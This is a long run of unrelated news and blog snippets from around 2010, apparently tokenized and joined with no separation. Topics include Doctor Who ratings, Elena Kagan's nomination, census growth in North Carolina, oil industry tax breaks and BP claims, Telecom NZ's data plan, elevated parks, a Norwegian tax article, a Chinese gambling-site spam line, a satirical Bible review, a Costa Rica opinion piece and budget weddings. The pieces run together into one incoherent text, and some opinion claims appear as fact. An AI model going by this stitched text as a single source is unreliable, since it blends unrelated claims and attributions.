Jenkins ' acting experience has been limited to a cameo in ITV soap Emmerdale in 2007 in which she played herself opening a fete .
Moffat will be hoping to emulate the success of last year 's Christmas specials , at the end of which David Tennant bowed out after four years in the lead role .
Part one of the two - part story , called The End of Time and featuring John Simm and Catherine Tate , was the festive season 's third most popular show .
Episode one attracted an audience of 10 million , according to overnight figures , with a further 343,000 watching part one on its high - definition channel , BBC HD .
However , this was marginally down on the 11.7 million who watched the 2008 Christmas special , according to overnights , and the 12.2 million who saw 2007's Christmas special , featuring Kylie Minogue as a waitress on the Titanic .
• To contact the MediaGuardian news desk email editor@mediatheguardian.com or phone 020 3353 3857 .
For all other inquiries please call the main Guardian switchboard on 020 3353 2000 .
• If you are writing a comment for publication , please mark clearly " for publication " .
WASHINGTON  Solicitor General Elena Kagan moved one step closer to becoming a Supreme Court justice on Tuesday when the Senate Judiciary Committee voted 13 to 6 , almost entirely along party lines , to forward her nomination to the full Senate for consideration .
Just one Republican , Senator Lindsey Graham of South Carolina , broke ranks with his party to back Ms. Kagan .
His lengthy speech supporting her led to debate about the Senate ’s increasingly partisan approach to judicial confirmations , as he took colleagues  including President Obama when he was a senator  to task for basing their votes on philosophy , rather than qualifications and character .
“ No one spent more time trying to beat President Obama than I did , except maybe Senator McCain , ” Mr. Graham said , referring to his work trying to elect Mr. Obama ’s Republican rival in 2008 .
“ I missed my own election .
I voted absentee .
But I understood  we lost ; President Obama won .
The Constitution in my view puts a requirement on me not to replace my judgment for his . ”
In suggesting that presidents deserve great deference , Mr. Graham seemed to offer the Senate a path back to the days when Supreme Court nominees were approved unanimously , or close to it .
These adaptive - lens eyeglasses were designed by Adlens to correct almost anybody 's vision , all with the simple twist of a knob .
Holy shit , technology !
( Call me when there 's a monocle version )
How they work :
The lenses are hollow , with a plastic sheet stretched across it on the inside .
When you twist the dial , fluid pumps in between the sheet and the lens .
The fluid is clear and has a high refractive index .
The more fluid that pumps in , the more the curvature of the sheet increases , making the lens more powerful .
Adlens markets these glasses for the developing world since things like opthamologists and opticians can be scarce there , but they could be useful in developed countries as well .
That 's actually pretty clever .
But the question remains :
If you turn the knob all the way do you get x-ray vision ?
Just a headache ?
Damn .
So no titty - vision is what you 're saying ?
Brilliant eyeglass design corrects vision for anyone [ dvice ]
Не неудержимые , но все же # 28
— The Triangle had some of the country 's fastest - growing municipalities in the past decade , and North Carolina gained three more towns and cities with a population over 100,000 in the same period .
Statistics released Friday by the U.S. Census Bureau also show that Cary , Wilmington and High Point grew enough to join ranks with six other municipalities in North Carolina with at least 100,000 residents .
Those numbers show that from 2000 to 2009 , Raleigh , Cary and Durham were among the fastest - growing of America 's 276 municipalities with a population of over 100,000 .
Raleigh 's population grew by 40.7 percent , from 288,462 to 405,791 .
Cary 's grew by 41.4 percent , from 96,598 to 136,600 .
Durham 's grew 22 percent , 187,897 to 229,174 .
That growth ranked Cary as no .
19 , Raleigh as no. 20 and Durham as no. 44 among U.S. cities with a population of over 100,000 .
Raleigh was the fastest - growing of the country 's 50 largest cities .
Behind it were Fort Worth , Atlanta , Charlotte and Miami .
Charlotte had an estimated 709,441 residents in 2009 , up 25 percent over the decade .
Four other North Carolina cities ranked among the top 100 fastest - growing cities with a population over 100,000 – High Point at no. 50 , with 19.8 percent growth ; Winston - Salem at no. 76 , with 14.1 percent growth ; Wilmington at no. 88 , with 13.0 percent growth ; and Greensboro at no. 95 , with 12.1 percent .
Fayetteville was the only municipality with a population in North Carolina to lose residents over the decade .
The city 's population dropped by 2.5 percent , from 203,209 in 2000 to 198,061 in 2009 .
In a bid to promote some of its major legislative accomplishments , the Obama administration highlighted this week the positive impacts of the economic recovery act and announced new rules created under the health reform law that will improve health insurance for tens of millions of Americans .
In advance of her quarterly report to Congress on the recovery act , top White House economic advisor Christina Romer told reporters , July 14 , that the stimulus package has “ raised employment ” by more than 3 million jobs , but more needs to be done to ensure that all working families feel the full benefits of the recovery .
Romer reported that at the end of the second quarter of 2010 , the stimulus package boosted the GDP between 2.7 and 3.2 percentage points over what it would have been if the law had not gone into effect .
Also in the second quarter alone , stimulus programs created or saved some 800,000 jobs , 30 percent more than in the first quarter of 2010 .
While direct payments and tax cuts that impacted about 95 recent of working families were important features of the law , she emphasized the “ public investment ” portions of the stimulus act and its role in job creation .
A significant number of the projects funded by the recovery act will be put into place this summer , creating new job opportunities .
The recovery act is funding “ everything from convention construction , like roads , bridges and airports , to 21st century infrastructure like the smart electrical grid , universal broadband and health information technology , ” Romer said .
In addition , stimulus funds are being invested in promoting green industries such as wind energy , energy efficiency retrofits and new research on long - life batteries .
Romer also reported that almost $ 100 billion of the recovery act aimed to “ leverage ” new investments from the private sector with tax incentives , loan guarantees , and matching grants in job - creating industries .
She estimated that this part of the program encouraged some $ 380 billion in new investments .
She called these types of programs “ public - private partnerships ” and predicted they would be an important source of new job growth going forward .
Even with these successes , Romer noted , some urgent problems remain .
She called for passage of pending legislation that would provide additional aid to state governments to help them avoid laying off thousands of teachers or public safety personnel to cut their budgets .
The administration wants passage of financial reform and a new small business stimulus package to help speed economic recovery , she said .
The President is also working hard to make sure recovery act funds are moving quickly into the economy and are spent efficiently , she explained .
Extension of unemployment insurance is also a top priority , Romer added .
Some 2.1 million have already seen their unemployment insurance benefits stop as a result of Senate Republicans legislative maneuvers to block an extension .
Another three million will lose theirs by the end of this month without congressional action .
On top of the report on the economic recovery , the administration also announced , July 14 , a new regulation authorized under the health reform law that will make preventive care available to tens of millions of people without an additional cost .
According to the Department of Health and Human Services , the new rule requires new health insurance policies created after September of this year to cover preventive services at no additional costs .
The new rules will help Americans gain easier access to services such as blood pressure , diabetes , and cholesterol tests , many cancer screenings , routine vaccinations , pre-natal care , and regular wellness visits for infants and children , an HHS press statement said .
People will also have access to counseling services for smoking and healthy dieting .
In a White House event announcing the new policy , First Lady Michelle Obama stressed the importance of preventive care for keeping families healthy .
“ Getting access to early care and screenings will go a long way in preventing chronic illnesses like diabetes , heart disease , and high - blood pressure , ” she said .
“ And good preventative care will also help tackle an issue that is particularly important to me as First Lady and as a mother – and that is the epidemic of childhood obesity in America today .
These are important tools , and now it ’s up to us to use them . ”
“ Too many Americans do n’t get the preventive services they need and the number one reason is cost , ” HHS Secretary Kathleen Sebelius told reporters following the event .
The health reform law changes that .
Sebelius pointed out that provision of regular preventive health services such as these could help avoid 100,000 deaths each year .
She estimated that 41 million people with insurance now , either through their employer or in individual plans , will benefit from this new regulation .
“ The administration is laying the foundation to help transform the health care system from a system that focuses on treating the sick to a system that focuses on keeping every American healthy , ” Sebelius explained .
Photo : President Obama visits a Kansas City electric vehicle manufacturing company .
( White House photo )
Even as competitors are busy bricking paywalls around their newspaper Web sites , desperately trying to keep the old business models running , the U.K. ’s Guardian is taking a wholly different path .
The paper has just introduced a free story syndication tool .
The tool is part of the paper ’s “ Open Platform ” initiative , and what it does is pretty amazing :
If you ’re a publisher of a blog that uses WordPress , you can now re-post Guardian articles directly on your blog .
The Guardian is essentially giving away its online news content .
For free !
There are some conditions , of course :
You have to publish the article in full .
You also must n’t remove or alter any “ text , links or images , ” so that you preserve the original article with all of its Guardian - sourced editorial goodness .
You have to register to get an access code to let you re-publish content , but there ’s no fee involved .
The articles come with performance tracking code built - in , which you also must n’t tamper with , but for the privilege of reproducing the content for free this is n’t too much of a price .
The astute observer will be wondering how the Guardian is monetizing this , given that competing papers are busy shutting off free access to their own content on their own Web sites .
And the answer is the obvious one :
The freely syndicated articles have ads embedded in them ( which you must not adjust if you ’re republishing –though the Guardian notes you ’re free to have your own ads elsewhere on the page to drive your own monetization efforts ) .
So by republishing the Guardian content , you ’re effectively multiplying the newspaper ’s advertising footprint … and this is how the publication is hoping to make a success of this bold move .
If it finds its articles grabbed and republished many times–a situation that may happen as less and less big - name news articles are freely available –then it ’ll be able to charge more fees to its advertising partners .
Really , this is quite a bold experiment by the publication .
In a time when other traditional news sources are running scared from the big , bad Internets , the Guardian is trying a “ grab the bull by the horns ” approach , and launching an anti-paywall strategy .
Only time will tell if it ’s successful .
To keep up with this news , follow me , Kit Eaton , on Twitter .
Oil industry benefits from billions in tax breaks
By Hiram Lee
6 July 2010
The oil industry is the beneficiary of extraordinary tax breaks and financial incentives , a Sunday report by the New York Times reveals .
The report underscores the federal government ’s role as guarantor of oil industry profits .
“ Capital investments like oil field leases and drilling equipment are taxed at an effective rate of 9 percent , ” according to the article , “ significantly lower than the overall rate of 25 percent for businesses in general and lower than virtually any other industry . ”
Indeed , for many oil companies , returns on capital investments are typically higher after taxes because the numerous write - offs and incentives granted to them are more than enough to make up for the taxes they owe on those investments .
As revealed in a letter to the Senate Finance Committee last month , BP was able to write off 70 percent of the rent it paid for the Deepwater Horizon oil rig , saving the company $ 225,000 per day since the lease went into effect .
Among the numerous tax subsidies for oil companies currently on the books is the Volumetric Ethanol Excise Tax Credit ( VEETC ) , granted to oil refining companies that blend ethanol into gasoline .
The credit amounts to 45 cents per gallon and has proven a windfall for companies like BP .
Seventeen billion dollars in VEETC subsidies were paid out to oil companies overall between 2005 and 2009 .
In 2008 , BP would have received approximately $ 510 million in VEETC credits , and this year it stands to gain $ 600 million in credits .
The Deepwater Royalty Relief
Act of 1995 , signed into law by President Clinton in 1995 , suspends royalty payments for eligible companies whose drilling leases are determined not to be “ economically viable ” without “ relief . ”
Royalty fees owed to the US government , often as 18.5 percent of the volume of oil extracted , are suspended entirely under the law in order to “ relieve ” the multi-billion dollar corporations and to encourage continued interest in offshore drilling in the US .
Several drilling projects in the Gulf of Mexico have been granted royalty relief under the law .
In addition to the extraordinary number of breaks granted to them by the US government , the oil companies find more ways to avoid taxes by relocating their headquarters outside the US .
Transocean , the corporation which owned the Deepwater Horizon drilling rig rented by BP , relocated its headquarters from Delaware to the Cayman Islands in 1999 before ultimately setting up shop in Zug , Switzerland in 2008 , all in an effort to avoid paying taxes .
The move to Switzerland allowed the corporation to pay just 16 percent in taxes on its $ 4 billion income in 2009 .
The Deepwater Horizon rig was itself officially registered with the Marshall Islands in order to avoid what little tax burden that might have been placed on its operations under US law .
Such practices are common in the energy industry .
ExxonMobil has holdings located in the Bahamas , Bermuda and the Cayman Islands for the purpose of avoiding US taxes , and the oil giant paid no net US federal income tax in 2009 .
A 2008 study produced by the Government Accountability Office revealed that only two out of three US corporations paid federal income taxes between 1998 and 2005 .
While representatives of the oil and energy industry claim that the removal of tax breaks and subsidies such as these will have a devastating effect on the industry and lead to widespread job loss , a 2009 report before a congressional hearing on “ energy , natural resources and infrastructure ” by Alan B. Krueger , the Assistant Secretary for Economic Policy and Chief Economist for the US Treasury Department , refuted these assertions .
“ Based on estimates of short and long run supply elasticities , ” said Krueger , “ we estimate that the decrease in domestic production due to these proposals [ to repeal existing subsidies ] will be less than one half of one percent , even in the long run . ”
The fact that the oil industry has received hundreds of billions in tax breaks and incentives over the past 15 years makes all the more glaring BP ’s refusal to pay adequate compensation to victims of its criminal negligence in the Gulf .
According to a BP spokesman , the company has only paid $ 144 million total to claimants across four Gulf states , while tens of thousands of claims have most likely not even been considered .
Cannon Cochran Management Services , hired by the state of Louisiana to review the increasingly problematic claims process , found that in June compensation requests rose by 170 percent , from 30,000 claims to over 80,000 claims , even though the number of claims adjusters in place to handle the demand only increased by 87 percent , from 510 to 951 .
Cannon Cochran found that on June 21 , immediately following the state ’s demand that BP speed up the compensation process , the oil giant mailed out 2,500 claims checks .
Just a week later , the number of checks going out each day had decreased to under 500 .
Kristy Nichols , Louisiana ’s Children and Family Services Secretary told the Associated Press , “ This is extremely distressing ; families and businesses are depending on those payments to keep roofs overhead and food on tables . ”
She added , “ BP must immediately address its apparent inability to keep up with daily incoming claims and pay claimants in a timely manner . ”
On Monday , BP announced the total cost of the Deepwater Horizon disaster has now reached $ 3.12 billion .
According to an official press release , this amount includes the “ cost of the spill response , containment , relief well drilling , grants to the Gulf states , claims paid , and federal costs . ”
But as cleanup efforts in the Gulf of Mexico resume following a week of storms and rough seas caused by Hurricane Alex , reports continue to emerge which cast doubt on just how much of the $ 3 billion has really gone to workers and small business owners in need of compensation .
In fact whatever BP has paid out it can count against the total sum it must contribute to the Obama administration ’s Independent Claims Facility , which BP is to fund to the tune of about $ 20 billion over a four - year period ( “ neither a floor or ceiling , ” according to the White House ) .
In addition to claims , BP can specifically count against the fund “ judgments and settlements , natural resource damage costs , and state and local response costs , ” according to a White House fact sheet .
Kenneth Feinberg , selected to head the escrow account , has declared those “ indirectly ” affected by the oil spill will not be entitled to compensation .
Among those not directly affected , according to Feinberg , are families whose homes have declined in value and tourism industry employers and workers who have suffered from the “ perception ” that their beaches have been destroyed .
Also not entitled to compensation will be fishermen who operate on a cash - only basis — a sizable share of the New Orleans fishing industry .
USA TODAY reporter Judy Keen reports from Galveston , Texas :
We began our 1,000 - mile trip along the Gulf of Mexico in Galveston , Texas , where some local residents were n't thrilled to see us .
Some tar balls - tested and confirmed as part of the BP oil spill - washed up on beaches here a couple weeks ago .
Since then , TV stations from Houston have been here , waiting for more evidence of the spill to taint Texas beaches .
Galveston depends on tourism and still is recovering from Hurricane Ike , which swept much of the city away in 2008 .
J. Connolly Huff , a retired bar owner , says the last thing Galveston needs is more bad news to scare tourists away .
Most of the vacation condos in town are booked for the rest of summer , he says , but negative headlines might prompt cancellations .
MAP : Track the trip along the Gulf
On this sunny , 97 - degree day , beaches were crowded , but at lunchtime the shops and restaurants on the Strand , the city 's historic district , were n't very busy .
There were some empty storefronts , too .
Three families from the Dallas - Fort Worth area who are vacationing in Galveston for the third year were n't worried about oil spills or tar balls .
" Oil 's not new to the Texas coast , " said Jason Whorrall , 36 , a web developer who lives in Flower Mound but grew up in the Houston area .
" There were always tar balls on the beach when I was a kid , " he said .
" They would get on our feet when we were at the beach .
We 'd pull them off our feet and get back in the water . "
A ferry ride north of Galveston is the Bolivar Peninsula , which also was hammered by Ike .
I was here in April 2009 to report a story , and many but not all of the wrecked homes and businesses have been rebuilt .
Will Rufener , 29 , and his cousin Brandon Rufener , 27 , were fishing in the surf near Crystal Beach , a small town on the peninsula .
They live in Houston and also took the ferry .
Will thought he saw a 6 - foot patch of oil in the water from the ferry .
The cousins talked about whether there would be oil on the beach and wondered if fishing would be affected .
They have n't spotted anything on the beach yet , but Will said , " Honestly , I think it 's inevitable . "
Bruce Dement , 48 , a private investigator from Houston and his wife Debbie , 44 , were walking on the beach looking for signs of oil .
They 're here celebrating their 25th wedding anniversary .
He hopes the leak will be plugged before it fouls the Texas coast .
" They 've got to stop it , that 's the deal , " he said .
We 're headed now for Port Arthur , Texas , an oil industry city that 's been through plenty of oil spills .
The beach is cooler : only 90 degrees .
House disbursement data for 2010 now online
We ’ve released a cleaned up version of the House disbursements data that covers the first quarter of 2010 , during which the House spent more than $ 339 million on salaries , expenses and equipment .
Last month we aggregated and analyzed all the data in the statement of disbursements , which the House started publishing online in a PDF format in December 2009 , showing for the first time the private firms that do the most business with the House .
To make this data useful , the Sunlight Labs team had to parse the information in the PDF so it could be searched , sorted and aggregated in a meaningful manner .
To download this data go here and once you are on the Socrata table , click on the menu button and download the entire data set in any format you are comfortable with .
You can download this data for a smaller subset like for a specific member of Congress and hone in on certain details .
For example , with the last round of records , CQ - Roll Call found that House Speaker Nancy Pelosi was paying the most among House members for district office space , in her case in San Francisco .
Some of the criticisms we had of the data from the last time still hold good .
For instance , individual records still omit detailed information about the places to which House members or their staff are traveling or the make and model of computers purchased , details that were available when the House published this information in huge , hard bound books .
BEING bearish on China may not turn out to be wise , but it does require some ingenuity .
Shorting domestic stocks is illegal .
Futures and options markets for equities either do not exist locally or barely trade .
It is possible to buy credit - default swaps ( CDSs ) , a form of insurance against default , on China 's sovereign debt , but few think that would really go belly - up anyway .
A pair of widely circulated reports on how to hedge a downturn , written in April by Goldman Sachs ( stamped “ highly confidential ” ) and Morgan Stanley respectively , spell out some of the alternatives for investors .
In each , the underlying idea is similar : if shorting China is impossible , find things tied to China .
In Morgan Stanley 's view , that means starting with various financial assets — shares , credit instruments , and currencies — in South Korea and Australia ( see chart ) , the two countries with the strongest connections to China after adjusting for re-exports .
Both places offer numerous financial products , such as exchange - traded funds linked to indices , that can be shorted .
The report also cites three commodities that are particularly tied to China 's growth : copper , above all ; then soyabeans ; and oil .
In its hedging scenarios , Goldman 's report concentrates on some different products .
It looks at the value of buying CDSs on Hutchison Whampoa , a telecoms company in Hong Kong with deep ties to China ; an index of Asian ( excluding Japanese ) CDSs ; and a combined option structured to benefit from a decline in the Australian dollar , Goldman 's own commodities index and the Hang Seng China Enterprise Index , comprising Chinese companies listed on the Hong Kong stock exchange .
Such ideas can be augmented , of course , by adding other China - focused companies trading in overseas markets , or certain commodities , such as molybdenum , which is used in steel , or nickel .
Deciding which to go for partly depends on costs , such as transaction fees , and market liquidity .
Data on the popularity of such bets are not widely available .
But anecdotal evidence suggests plenty of people are bearish .
It is a “ crowded trade ” , says one hedge - fund manager .
As a result , when the market turns upward a “ short squeeze ” can develop as traders seek to cover their positions by scrambling to buy back shares .
That may have happened this week when a rumoured shift in the government 's position on taxing property transactions sent shares in developers soaring .
And therein lies the greatest risk of betting against China .
It may do well .
Telecom will axe its " Big Time " internet plan which lets customers download as much as they are able for $ 69.95 a month .
Tens of thousands of customers signed up to the plan after it was launched in July , but complaints have grown about poor performance .
Telecom homes services director Ralph Brayham blamed a minority of customers who had their foot to the floor downloading thousands of movies a month , each generating " terabytes " of traffic .
Being the only internet provider offering uncapped internet plans , it had ended up with " all the vampires " , he said .
Telecom reserved the right to manage Big Time traffic to de-prioritise the sharing of music and movies through " peer - to - peer " file sharing sites .
That should have ensured there was enough capacity for all Big Time customers to get a good service surfing the web and accessing email .
Mr Brayham said that was easy in the beginning , but some customers began using software to stay a step ahead of tools Telecom used to ration file sharing .
" It leads to a poor customer experience if we keep playing chicken and egg with these guys .
It has become very difficult for us to manage the traffic in a way that provides the right customer experience as well as being an economically viable product for us . "
Telecom will stop signing up Big Time customers today and will contact people who are on the plan over the next two months , to move them on to other plans .
Telecom offers one costing $ 69.95 a month with a 20 gigabyte traffic cap which Mr Brayham said would suit many Big Time customers .
The other option was its " Pro " plan costing $ 89.95 a month that has a 40 gigabyte traffic cap .
Charges for extra data on the Pro plan have been cut from $ 20 to $ 2 a gigabyte to make it more attractive for heavy users .
All the plans cost $ 10 less if customers have their toll calls with Telecom .
When Telecom launched Big Time it said it had done so to provide certainty to customers such as families and flatters sharing a broadband connection , who could find data caps hard to manage .
Mr Brayham said he was disappointed Big Time had not worked out .
Telecommunications Users Association chief executive Ernie Newman said he sympathised with Telecom but was also disappointed .
" If you are the only restaurant in town with an `all you can eat ' menu , you are going to attract the big eaters . "
Mr Newman said it showed the Government was on the right track with its proposed investment in fibre - optic cable " so we can look forward to a time when bandwidth ceases to be a constraint " .
Who says parks have to be on the ground ?
Elevated parks are gaining popularity all over the world , with one of the most notable being the High Line in New York .
As public favor for these sky - high recreational spaces continues to grow , more cities are unveiling plans for elevated parks .
These are two of the most recent – and most fascinating – designs to emerge .
Park 101 , Los Angeles
LA is serious about a downtown revitalization effort , and it shows in the care that ’s been put into developing the Park 101 idea .
The proposal consists of a half - mile - long urban park that transforms a section above Hollywood Freeway ( US 101 ) into a natural haven in the middle of the city .
Currently , the freeway bisects the downtown area and makes it difficult for pedestrians to access many important areas .
The park would provide an important “ bridge ” between the north and south sides of the freeway while restoring some green space to the urban setting .
The massive pedestrian - friendly Park 101 will include a large freeway - level parking structure to encourage people to leave their cars behind and walk their way through downtown .
Buildings at both ends of the park are planned for mixed use development such as retail space and residences .
At the western edge on Grand Avenue , two tall towers will welcome visitors .
At the eastern edge of the park , the anchor buildings will be smaller and more modest to blend in with existing architecture .
The project is still in the planning and fund - raising stages , but overall it looks like a very positive change for the area .
One of the project ’s goals is to make Los Angeles a more sustainable and pedestrian - friendly city which it will almost certainly accomplish .
But just as importantly , the project planners hope to bring together two sides of LA which have historically been divided by a huge freeway running between them .
The proposal focuses not only on the environmental impact of the park , but on the positive cultural impact as well .
Transbay Transit Center , San Francisco
As part of a massive new transit center design , San Francisco will soon welcome a huge 5.4 acre elevated park .
The Transbay Transit Center will house 12 transit systems and the city ’s new high - speed rail terminus , but the green roof is the icing on the cake .
The design , created by Pelli Clark Pelli Architecture , will reside in downtown San Francisco and is destined to become a new cultural center for the already - rich downtown area .
The building itself will be a beautiful addition to the city ’s architecture , with a shape inspired by swaying tree trunks .
But high above the transit hubs contained within , the City Park atop the building will become an attraction of its own .
The space will incorporate cafes , retail areas , playgrounds , public art exhibits , an amphitheater and display gardens with climate - appropriate plants .
It might be hard to imagine now : a green public space high above street level in downtown San Francisco ?
But the transit center project will soon be a reality .
The project is slated for completion sometime in 2017 .
When finished , the rooftop park will provide both active and tranquil spaces for people who are traveling through the city or those who live nearby and simply need a break .
Using space that would typically be wasted – the top of a building – is not only a brilliant planning technique ; it ’s a great way to save energy .
The green roof will help cut down on utility costs , and the building incorporates several other energy - saving features to make it an overall win for the city .
万搏体育平台官网登录-贝巴：最初不太看好伊哈洛这笔引援，后来证明我错了虎扑3月8日讯
贝尔巴托夫在接受采访时谈到了伊哈洛，他表示伊哈洛的表现已经证明，自己当时的想法“是错误的 ” 。
“ 我很高兴看到伊哈 …
Eldrebølgen vil kunne gå hardt ut over lommeboken din allerede om tre år , advarer Ap - Raymond .
Aps løfte om å ikke øke skattetrykket står for fall .
Når eldrebølgen setter inn mot slutten av tiåret må skattenivået øke , mener partisekretær i Ap , Raymond Johansen .
Det skriver VG onsdag .
Han peker på at det fra 2017 vil bli langt flere eldre her i landet .
Da må statens inntekter økes .
Ikke økt skatt denne stortingsperioden
Johansen understreker at han ikke ser noe behov for et høyere skattenivå i denne stortingsperioden , og trolig heller ikke i neste .
- Men vi kommer ikke utenom en diskusjon om hvordan vi skal finansiere velferdsoppgavene , sier Johansen til VG .
Åpner ny skattedebatt
Ap og regjeringspartnerne SV og Sp lovte før valget i 2005 å ikke øke det samlede skattenivået til ut over 2004 - nivå .
Dette løftet ble forlenget foran valget i fjor , og bidro til å gjøre skatt til en ikke - sak i valgkampen .
At Johansen , som en av tre i Aps toppledelse , nå åpner for en ny diskusjon om skattenivået noen år frem i tid , vil trolig bli lagt merke til både i deler av eget parti og ikke minst hos regjeringspartner SV .
Johansen erkjenner overfor VG at Ap trolig vil komme forslag om økte skatter i forbindelse med programprosessen foran stortingsvalget om tre år .
Få bedre råd med Nettavisens tjenester :
Minstrøm : Bytt strømleverandør og spar tusener .
Minrente : Bytt bank og spar minst 5000 kroner i året .
Mittoppdrag : Få tilbud fra håndverkere .
( Tjenestene er gratis for Nettavisens lesere )
Watch the short film Mortal Kombat : Rebirth , which was made as a test film for a feature R-rated Mortal Kombat movie from Warner Bros .
Pictures .
Short features popular game characters including Baraka , Sonya Blade , Scorpion , Reptile and Johnny Cage .
Thanks to LatinoReview for film credits .
Nobody knows for certain who wrote the Bible , but the book itself claims to be the infallible word of the one true God ; therefore the author must be divine .
Satan -
God 's immortal enemy whom God Himself created ( possibly on an off day ; even omnipotent beings have their moments ) - has led many nasty critics to suggest that several men- not one God- wrote the Bible .
They point to internal inconsistencies and many different styles of writing , along with the distinctly human language used throughout , but the voices in my head assure me that God was merely employing " artistic licence " .
He does , after all , move in mysterious ways .
The story itself begins with a piece of blatant Creationist propaganda , or a sublime literary metaphor about the emergence of existence and life on earth .
Unfortunately , God chose to omit the footnote advising
His trusting followers as to how to interpret the creation story - something Christians have been unable to agree on ever since the faith was invented .
There is no mention of evolution -
God wanted humanity to endure the dark ages before that particular theory was revealed to his liberal followers as part of the divine plan .
What follows is an entirely reliable record of the history of the Jewish people - so reliable even the Jews believe it !
Eventually , after accounts of many outdated laws and mass murders , we get to the most important character - Jesus - a wonderful man whom I know personally !
There is a conspiracy theory that Jesus never even existed , but that 's ridiculous , I mean , he's in the Bible , and millions of people pray to him every day - with positive personal responses !
Not only are there countless prophecies about Jesus which are clearly later fulfilled , but Jesus performs miracles like healing the sick , multiplying food and raising the dead .
He even comes back from the dead Himself , proving that He was and is God .
There were thousands of eye - witnesses to these events , but nobody wrote anything about them till about thirty years later .
The usual cop out involves the prevalence of an " oral tradition " despite several scholars who recorded other events at the time , but wrote absolutely nothing on the most remarkable human - cum - deity who ever lived .
But we have the Gospels , and they do n't call it " Gospel truth " for nothing !
Ultimately , the truth of the stories and dogmatic doctrines laid out in the Bible comes down to faith .
And if you believe , you can do ANYTHING !
After all , Jesus Himself says : " Knock and the door will be opened unto you . "
He neglects to mention how quickly the very same door gets slammed back in the unfortunate faces of some religious salesmen , but obviously these unsuccessful evangelists are n't praying hard or well enough !
One of the Bible 's strong points is its ethical system , which remains relevant even today .
There is no telling how many lives have been saved or improved by forbidding evils like abortions and contraception , and it is a verifiable fact that wars in the name of God have killed lots less people than atheist tyrants such as Stalin , Hitler and Mao .
Whether you believe the Bible or not is a matter of free personal choice , but beware - those who do not believe will face an eternity of torment and suffering , because God loves everybody totally and equally !
Amen .
Michael Edwards
One would think that America is experiencing Boom Times with the way their government is throwing around money lately .
The recent announcement that a flotilla of warships and troops will be sent to Costa Rica would ordinarily be laughable for its wastefulness , but with America experiencing an unemployment rate north of 20 % and the median duration of unemployment at the highest in the last 50 years , this should be no laughing matter .
Many Americans do not know much about Costa Rica , its history , or its current political landscape .
It might be worth knowing exactly how and where American tax dollars are being spent .
Here are some basic facts about Costa Rica :
Costa Rica is a democratic republic with a very strong system of Constitutional checks and balances .
Costa Rica does not have a military ; it was abolished in 1948 .
Recent president , Oscar Arias , was a Nobel Peace Prize winner in 1987 .
Costa Rica consistently ranks as one of the happiest places on Earth according to many polls , including the first ever “ happiness poll ” conducted by Gallup , where it was determined to be # 1 in The Americas .
In other words , Costa Rica ’s lack of a military culture has been enshrined , and is part and parcel of their overall happiness .
Forty - six warships , 200 helicopters , and 7000 troops being sent to patrol the coastal waters of Costa Rica sends the world a false message that Costa Rica is in some way needy of this massive loan of the American military .
Furthermore , the entire region is moving away from neoliberalism , and toward solidarity , in an attempt to build a sovereign Latin America .
We have to assume that Costa Rica ’s welcoming support of the American military is likely to fan regional tensions , at the very least .
Or , could that be the reason itself for such a move ?
In a comprehensive article by Mark Vorpahl , writing for Global Research , he points out that such an excessive amount of military in order to “ combat drug trafficking ” or “ offer humanitarian aid ” to a country the size of Rhode Island can hardly be justified in and of itself .
Much more likely is that this is regional in scope and is a U.S. intimidation force , rather than a humanitarian mission .
Vorpahl asserts that the U.S. is determined to return to the Monroe Doctrine principles which led to the overthrow of popular governments throughout Latin America .
He states the results :
Therefore , the U.S. Empire builders could use their political and economic might alone to subjugate these neo-colonies to a very profitable neoliberal agenda .
This agenda included allowing U.S. corporations easy access to pillage these nations ’ public sectors through privatization , letting multi-national corporations overrun these nations ’ local markets and farms through the elimination of trade barriers , and increasing the exploitation of their workers and the devastation of their natural resources by tossing out national labor and environmental standards .
Because of the profits enjoyed by a few as a result of these measures , they carried the day , though they , in turn , created a simmering spirit of rebellion in the semi-colonies ’ peasantry and workers that would inevitably find expression .
It is true that Costa Rica is in a precarious geographical location amid other historically less peaceful ( and much poorer ) nations , but this is nothing new .
It seems that the most likely scenario is that America would like to take the Drug War show to a new area of the high seas , and they have found a convenient headquarters for operations .
Geopolitics notwithstanding , the financial cost to America should be noted .
America is already embroiled in two major wars ; has military bases all over the planet ; and has a true disaster spreading along its own coast , not to mention the elephant in the living room of a looming second Great Depression
As a frequent visitor to Costa Rica , I can only add that if the Costa Rican government is allowing its country to be the staging ground and corporate headquarters for empire building in Latin America , they should be called on it .
If the Costa Rican people decide to abandon their dedication to peace , and the absence of a military , by allowing this violation of their sovereignty and Constitution , they are truly misguided .
( CNN ) --
It was n't the dream wedding Rachel Sifuentes , 28 , envisioned as a little girl .
No walking down a church aisle .
No DJ at the reception .
No white dress .
Instead , Sifuentes and her husband followed their attendants dancing down the center lane of a bowling alley where the neatly lined - up pins faded into the background .
The ladies did n't carry flowers , but waved long ribbons .
The bridal party relied on an iPod for entertainment .
The bride wore a silky deep - blue gown -- the groom 's favorite color -- purchased at a discount .
" Luckily , everything turned out to be great , " said Sifuentes , who lives in Chicago , Illinois , and wanted to save money because her salary at the law firm where she works had been reduced .
Sifuentes ' bowling alley wedding in January may not have been traditional , but the creative ceremony saved her thousands of dollars at a time when wallet tightening has become necessary for many American families .
Her offbeat wedding is representative of a growing trend , wedding experts say , as brides are discovering cheap can be chic , and also inspire innovative party ideas .
" Necessity breeds ingenuity , " said Ariel Meadow Stallings , a writer who runs the online bridal site Offbeat Bride .
She explains what has ushered in the recent trend of frugal yet creative brides : " It 's the combination of the economy with the fact that through the '90s , there was a big explosion of the wedding industrial complex . "
Weddings remain a multibillion - dollar industry and summer is the busiest season .
There were about 2.2 million weddings in 2009 , with each event averaging 128 guests , according to The Wedding Report Inc. , a research company that tracks the wedding industry .
But the wedding business may slowly be eroding in the fragile economy .
The average cost for a wedding dipped in 2009 to about $ 19,500 from a peak of $ 28,700 in 2007 , said The Wedding Report Inc .
So far this year , wedding spending has improved -- with the economy -- to an average of $ 23,800 .
Sifuentes ' bowling alley wedding was a bargain :
She spent about $ 5,000 , which included the ceremony and reception .
Websites and blogs -- such as A Practical Wedding and 2000 Dollar Wedding -- have surfaced over the last few years to help brides creatively pinch their pennies .
In Maine this summer , one bride substituted a baked potato bar for a traditional five - course meal at the reception .
Other brides have replaced costly gourmet cakes from bakeries with homemade Rice Krispies treats and chocolate chip cookies .
Some couples recommended switching from a dinnertime reception to a brunch or hosting the wedding on a weekday night rather than on the more popular Saturday .
Other brides have abandoned expensive venues such as private hotels or banquet halls for public buildings , parks and libraries .
One New York bride spent less than $ 600 on her wedding in 2007 by keeping the guest list short and having the ceremony in a public library .
When it comes to invitations , place settings , decorations and dresses , the brides have learned the power of DIY , which stands for " do it yourself . "
